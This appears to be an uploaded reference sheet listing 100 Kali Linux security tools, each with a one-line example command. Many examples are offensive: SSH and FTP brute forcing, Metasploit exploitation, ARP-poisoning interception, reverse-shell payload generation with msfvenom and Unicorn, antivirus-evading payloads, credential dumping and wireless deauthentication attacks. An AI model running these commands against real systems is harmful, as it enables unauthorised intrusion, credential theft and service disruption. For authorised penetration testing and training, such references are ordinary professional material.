
Kali Linux Tools

The document lists various tools available in Kali Linux for penetration testing and security assessments, including their functionalities and example commands. Tools such as Netcat, Hydra, and Metasploit are highlighted for tasks like data transfer, brute force attacks, and exploiting vulnerabilities. The document serves as a comprehensive reference for cybersecurity professionals looking to utilize these tools effectively.

Uploaded by

r.curienodin
Copyright
© All Rights Reserved

Kali Linux tools

1. Netcat – Listen on a specific port for incoming connections and transfer data
Example: nc -lvp 4444
2. Hydra – Brute force SSH login for a single username using a wordlist
Example: hydra -l admin -P passwords.txt ssh://192.168.1.100
3. Burpsuite – Intercept and modify HTTP/S traffic during web application testing
Example: Launch Burp and set your browser’s proxy to 127.0.0.1:8080
4. nmap – Scan a target with aggressive options to detect services, versions, and OS details
Example: nmap -A 192.168.1.1
5. John the Ripper – Crack password hashes using dictionary and brute force methods
Example: john --wordlist=passwords.txt hashfile.txt
6. Metasploit – Launch and manage exploits to compromise systems using known vulnerabilities
Example: msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.100; run"
7. Aircrack-ng – Capture wireless packets and crack WEP/WPA handshakes

Example: aircrack-ng -w wordlist.txt capture.cap


8. SQLmap – Automatically detect and exploit SQL injection vulnerabilities to extract DB data
Example: sqlmap -u "http://target.com/page.php?id=1" --dbs
9. Wireshark – Capture and analyze live network packets with detailed protocol dissection
Example: Open Wireshark and start a capture on your desired interface
10. Ettercap – Perform man‑in‑the‑middle attacks via ARP poisoning on local networks
Example: ettercap -T -q -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.100/
11. Nikto – Scan web servers for dangerous files, misconfigurations, and outdated software
Example: nikto -h http://target.com
12. OpenVAS – Conduct comprehensive vulnerability scans across networked systems
Example: Configure a target via the OpenVAS web interface and launch a scan
13. Tcpdump – Capture live packets on a network interface for protocol-level analysis
Example: tcpdump -i eth0 port 80
14. Hashcat – Use GPU acceleration to recover passwords from various hash algorithms
Example: hashcat -m 0 -a 0 hash.txt wordlist.txt
15. Binwalk – Analyze firmware images to extract embedded files and hidden data
Example: binwalk firmware.bin
16. Maltego – Perform link analysis and data mining to map relationships during recon
Example: Launch the Maltego GUI and run entity transforms against a domain
17. Kismet – Detect and capture wireless networks and associated clients passively
Example: Launch Kismet specifying your wireless interface (e.g., kismet -c wlan0)
18. WPScan – Enumerate vulnerabilities and weak configurations in WordPress sites
Example: wpscan --url http://targetsite.com --enumerate u

19. Dirb – Brute force common directories and file paths on a web server

Example: dirb http://targetsite.com


20. GoBuster – Brute force directories or DNS subdomains to uncover hidden paths

Example: gobuster dir -u http://targetsite.com -w /path/to/wordlist.txt
21. Ffuf – Fuzz web applications to discover hidden files, directories, or parameters

Example: ffuf -u http://target/FUZZ -w wordlist.txt

22. Netdiscover – Identify live hosts on a LAN via ARP requests


Example: netdiscover -r 192.168.1.0/24

23. SET (Social-Engineer Toolkit) – Craft and launch social engineering attacks like phishing
Example: Run setoolkit and follow interactive menus to build your payload

24. Recon-ng – Automate open‑source intelligence gathering with a modular recon framework
Example: Launch recon-ng and use modules like contacts-host against a domain

25. Wifite – Automate capturing and cracking of WPA/WPA2 handshakes from wireless networks
Example: wifite -i wlan0

26. SQLninja – Exploit SQL injection flaws in Microsoft SQL Server environments
Example: sqlninja -u "http://target/page.php?id=1"

27. LBD (Load Balancer Detector) – Detect load balancers or proxies masking a target’s true IP
Example: lbd -i eth0 192.168.1.100

28. Patator – Perform multi‑protocol brute force attacks with flexible module support
Example: patator ftp_login host=192.168.1.100 user=FILE0 pass=FILE1 0=usernames.txt 1=passwords.txt

29. Tcpflow – Capture and store entire TCP sessions for post-capture analysis
Example: tcpflow -i eth0 port 80

30. Scapy – Create, send, and manipulate custom network packets in Python
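Example:

```python
from scapy.all import IP, ICMP, sr1

# Build an ICMP echo request and wait for the first reply
packet = IP(dst="8.8.8.8")/ICMP()
response = sr1(packet, timeout=2)
# sr1 returns None if no reply arrives before the timeout
if response is not None:
    print(response.summary())
```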
31. Armitage – Graphical front-end for Metasploit to visualize targets and manage exploits

Example: Launch Armitage and connect it to a running Metasploit RPC server


32. BeEF (Browser Exploitation Framework) – Exploit vulnerabilities in web browsers via client-side attacks

Example: beef-xss to start the BeEF server and load its web interface
33. Cewl – Spider a website to generate a custom wordlist from its content

Example: cewl http://targetsite.com -w wordlist.txt


34. W3af – Scan and exploit web application vulnerabilities with an interactive console

Example: Launch w3af_console and execute a scan profile against a target URL

35. XSSer – Automatically detect and exploit cross-site scripting (XSS) vulnerabilities
Example: xsser --url http://targetsite.com/page.php?param=1

36. Skipfish – Crawl and audit web applications to discover security issues and map site structure
Example: skipfish -o output_folder http://targetsite.com

37. DNSenum – Enumerate DNS records, subdomains, and perform zone transfers on a target domain
Example: dnsenum target.com
38. DNSrecon – Conduct thorough DNS reconnaissance including brute forcing and zone transfers

Example: dnsrecon -d target.com -t brt


39. theHarvester – Collect emails, subdomains, and hostnames from public search engines

Example: theHarvester -d target.com -l 100 -b google
40. SSLstrip – Downgrade HTTPS connections to HTTP to intercept sensitive data

Example: sslstrip -l 10000

41. Responder – Poison LLMNR, NBT-NS, and MDNS requests to capture Windows authentication hashes

Example: responder -I eth0


42. Ncrack – Perform high‑speed network authentication cracking against various protocols

Example: ncrack -p 22 -u admin -P passwords.txt 192.168.1.100

43. Medusa – Parallel brute force login tool supporting multiple protocols

Example: medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh


44. SMBMap – Enumerate and assess SMB shares for misconfigurations and sensitive file exposure

Example: smbmap -H 192.168.1.100 -u guest

45. enum4linux – Extract information from Windows and Samba systems through SMB protocols

Example: enum4linux -a 192.168.1.100


46. CrackMapExec – Automate post‑exploitation tasks in Active Directory environments across networks

Example: cme smb 192.168.1.0/24 -u user -p pass

47. Mimikatz – Extract plaintext passwords, hashes, and Kerberos tickets from Windows memory

Example: Run mimikatz.exe on a compromised Windows machine (often via Wine in Kali)
48. Impacket – Utilize Python classes for crafting and executing low‑level network protocols

Example: python3 smbclient.py -target-ip 192.168.1.100

49. PowerSploit – Execute PowerShell scripts to perform post‑exploitation and offensive tasks on Windows

Example: Run a module like Invoke-Shellcode from the PowerSploit suite


50. Veil-Evasion – Generate payloads engineered to bypass antivirus detection

Example: veil-evasion --payload windows/meterpreter/rev_tcp

51. Unicorn – Convert shellcode into VBA macros for bypassing security in Office documents

Example: python unicorn.py windows/meterpreter/rev_https LHOST=192.168.1.100 LPORT=443


52. Arp-scan – Scan local networks by sending ARP requests to discover live hosts

Example: arp-scan -l

53. Wifiphisher – Automate phishing attacks against WiFi networks to capture WPA credentials

Example: wifiphisher -i wlan0

54. Fluxion – Conduct social engineering attacks to harvest WiFi passwords via a fake access point
Example: Run ./fluxion.sh and follow the interactive menus

55. Reaver – Exploit WPS vulnerabilities to retrieve WPA/WPA2 passphrases

Example: reaver -i wlan0 -b [BSSID] -vv

56. Bully – Brute force WPS PINs on wireless networks to compromise WPA/WPA2 security
Example: bully wlan0 -b [BSSID]

57. Pixiewps – Exploit Pixie Dust vulnerability in WPS to recover the WPA/WPA2 passphrase offline

Example: pixiewps -e <EAP data>

58. Fern Wifi Cracker – Graphical tool to audit and crack WiFi network passwords
Example: Launch the Fern Wifi Cracker GUI and select your target

59. Sherlock – Search multiple social networks to find accounts based on a username

Example: sherlock username

60. Sublist3r – Enumerate subdomains by leveraging multiple search engines and DNS queries
Example: sublist3r -d target.com

61. Amass – Map out attack surfaces through DNS enumeration and subdomain discovery
Example: amass enum -d target.com

62. Knockpy – Brute force subdomains using dictionary attacks against a target domain

Example: knockpy target.com

63. DNSMap – Map DNS records and discover subdomains to understand a target’s network structure
Example: dnsmap target.com

64. Paros Proxy – Intercept and modify HTTP/S traffic with a dedicated web security proxy

Example: Launch Paros Proxy and configure your browser’s proxy settings

65. ZAP (OWASP Zed Attack Proxy) – Intercept, fuzz, and scan web applications for vulnerabilities
Example: Launch ZAP and use the automated scanner on a target URL

66. Wapiti – Black‑box web vulnerability scanner that maps and tests web application components

Example: wapiti -u http://targetsite.com

67. Arachni – Scan web applications for security issues using a high‑performance Ruby framework
Example: arachni http://targetsite.com --report-save=report.afr

68. Xerosploit – Launch man‑in‑the‑middle attacks and network manipulation for red team exercises

Example: Run xerosploit and choose the desired attack mode from the menu

69. THC-IPv6 – A suite of tools to test and exploit vulnerabilities in IPv6 networks
Example: thc-ipv6 -I eth0

70. 6Scan – Perform IPv6 scanning to discover hosts and services in an IPv6 network

Example: 6scan -6 -p 80 target_ipv6_address

71. EvilGrade – Automate injection of malicious updates in systems with vulnerable update mechanisms

Example: Run evilgrade and configure a module to target a specific service


72. Grendel-Scan – Automate the detection of web application vulnerabilities with a modular scanner

Example: grendel-scan http://targetsite.com

73. Wfuzz – Brute force web application parameters and directories to uncover hidden resources

Example: wfuzz -c -z file,wordlist.txt --hc 404 http://target/FUZZ


74. Commix – Automatically test and exploit command injection vulnerabilities in web apps

Example: commix --url="http://target.com/page.php?param=1"

75. XSStrike – Advanced XSS detection and exploitation tool featuring fuzzing capabilities

Example: python3 xsstrike.py -u http://targetsite.com


76. DotDotPwn – Scan for directory traversal and file disclosure vulnerabilities in web servers

Example: perl dotdotpwn.pl -m file -h target.com

77. Wifijammer – Launch deauthentication attacks against wireless networks to disrupt connectivity

Example: wifijammer -i wlan0 -t target_mac


78. MDK3 – Perform DoS attacks and test wireless network robustness through various modes

Example: mdk3 wlan0 d -t target_mac

79. SMBclient – Access and interact with SMB/CIFS shares directly from the command line

Example: smbclient //192.168.1.100/share -U username


80. Msfvenom – Generate custom payloads for various platforms to use in exploits

Example: msfvenom -p windows/meterpreter/rev_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe


81. Driftnet – Monitor network traffic to extract and display images transmitted over the network

Example: driftnet -i eth0


82. NetSniff-ng – A suite of tools for high‑performance packet capturing and network analysis

Example: netsniff-ng -i eth0
83. Smbexec – Execute commands on remote Windows systems via SMB without needing prior access

Example: smbexec.py -target 192.168.1.100 -user user -pass pass


84. EvilAP – Create rogue wireless access points to lure clients into connecting for credential capture
Example: evilap -i wlan0

85. Arpwatch – Monitor ARP traffic to detect changes and possible spoofing on a network
Example: arpwatch -i eth0
86. OWASP Dependency Check – Scan project dependencies to identify publicly disclosed vulnerabilities

Example: dependency-check --project target --scan /path/to/project


87. Radare2 – A reverse engineering framework for analyzing binaries through disassembly and debugging

Example: radare2 -A binaryfile


88. Volatility – Analyze memory dumps for forensic investigation and process listing on compromised systems
Example: volatility -f memory.dump --profile=Win7SP1x64 pslist

89. Sleuth Kit – Forensically analyze file systems and recover deleted files from storage media
Example: fls -r /dev/sda1

90. Autopsy – Graphical interface for forensic investigations to analyze disk images and recover evidence
Example: Launch Autopsy and add the disk image as evidence
91. Fierce – DNS scanner to locate non‑contiguous IP space and enumerate subdomains

Example: fierce -dns target.com


92. SPARTA – GUI‑based network infrastructure scanner that maps out hosts and services
Example: Launch sparta and input your target network range

93. P0f – Passively fingerprint operating systems on a network without sending any packets
Example: p0f -i eth0

94. HTTrack – Download an entire website for offline browsing and analysis
Example: httrack http://targetsite.com
95. DNSChef – Spoof DNS responses to redirect target traffic for testing or analysis

Example: dnschef -i 192.168.1.100 -f hosts.txt


96. SMBrelay – Relay SMB authentication to exploit trust relationships between Windows systems
Example: impacket-smbrelayx -h target.com

97. Pupy – Cross‑platform remote administration tool for post‑exploitation and payload delivery
Example: python pupygen.py -f exe -O windows

98. RouterSploit – Exploitation framework targeting embedded devices like routers and IoT systems
Example: rsf.py (then use interactive commands to scan and exploit)
99. FuzzDB – Repository of attack patterns, payloads, and resources to assist in fuzzing applications

Example: Reference payloads from FuzzDB in your custom fuzzing scripts


100. Metagoofil – Extract metadata from public documents (PDF, DOC, etc.) for reconnaissance
Example: metagoofil -d target.com -t pdf -l 50 -n 10 -o output
